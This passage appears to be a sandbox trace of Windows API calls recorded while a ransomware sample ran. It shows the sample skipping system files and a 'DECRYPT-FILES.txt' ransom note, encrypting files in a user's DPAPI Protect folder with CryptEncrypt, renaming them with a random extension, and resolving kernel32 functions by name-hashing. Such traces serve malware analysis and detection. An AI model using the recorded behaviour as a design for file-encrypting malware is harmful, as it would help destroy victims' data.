halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.zvkiuj"), dwFlags=0x0) returned 1 [0078.420] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.421] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.421] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.421] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadddf80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaadddf80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaadddf80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.421] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.421] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.421] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.421] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.421] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.422] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0078.422] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.422] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0078.422] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp" [0078.422] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.422] CloseHandle (hObject=0x0) returned 0 [0078.422] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.422] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x542fc610, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x542fc610, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xf6455540, ftLastWriteTime.dwHighDateTime=0x1d4ae2c, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0078.422] lstrcmpiW (lpString1="Preferred", lpString2="DECRYPT-FILES.txt") returned 1 [0078.422] lstrcmpiW (lpString1="Preferred", lpString2="autorun.inf") returned 1 [0078.422] lstrcmpiW (lpString1="Preferred", lpString2="boot.ini") returned 1 [0078.422] lstrcmpiW (lpString1="Preferred", lpString2="desktop.ini") returned 1 [0078.422] lstrcmpiW (lpString1="Preferred", lpString2="ntuser.dat") returned 1 [0078.422] lstrcmpiW (lpString1="Preferred", lpString2="iconcache.db") returned 1 [0078.422] lstrcmpiW (lpString1="Preferred", lpString2="bootsect.bak") returned 1 [0078.423] lstrcmpiW (lpString1="Preferred", lpString2="ntuser.dat.log") returned 1 [0078.423] lstrcmpiW (lpString1="Preferred", lpString2="thumbs.db") returned -1 [0078.423] lstrcmpiW (lpString1="Preferred", lpString2="Bootfont.bin") returned 1 [0078.423] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0078.423] lstrlenW (lpString="Preferred") returned 9 [0078.423] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0078.423] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="Preferred" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" [0078.423] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.423] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.423] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=24) returned 1 [0078.423] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.423] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.423] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.424] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.424] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.425] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.425] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.426] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.426] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.426] CloseHandle (hObject=0x45c) returned 1 [0078.426] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.426] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.427] CloseHandle (hObject=0x0) returned 0 [0078.427] CloseHandle (hObject=0x458) returned 1 [0078.428] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.428] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.428] GetTickCount () returned 0x114c1aa [0078.429] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.429] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.429] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.429] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.429] lstrlenA (lpString="kernel32.dll") returned 12 [0078.429] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.430] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.430] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.430] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.430] lstrlenA (lpString="ADDATOMA") returned 8 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.430] lstrlenA (lpString="ADDATOMW") returned 8 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.430] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.430] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.430] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.430] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.430] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.430] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.430] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.430] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.430] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.430] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.430] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.430] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.430] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.430] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.431] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.431] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.431] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.431] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.431] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.431] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.431] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.431] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.431] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.431] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.431] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.431] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.431] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.431] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.431] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.431] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.431] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.431] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.431] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.431] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.432] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.432] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.432] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.432] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.432] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.432] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.432] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.432] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.432] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.432] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.432] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.432] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.432] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.432] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.432] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.432] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.432] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.432] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.432] lstrlenA (lpString="BEEP") returned 4 [0078.433] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.433] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.433] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.433] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.433] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.433] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.433] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.433] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.433] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.433] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.433] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.433] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.433] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.433] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.433] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.433] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.433] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.433] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.433] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.433] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.434] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.434] lstrlenA (lpString="CANCELIO") returned 8 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.434] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.434] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.434] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.434] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.434] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.434] lstrcpyA (in: 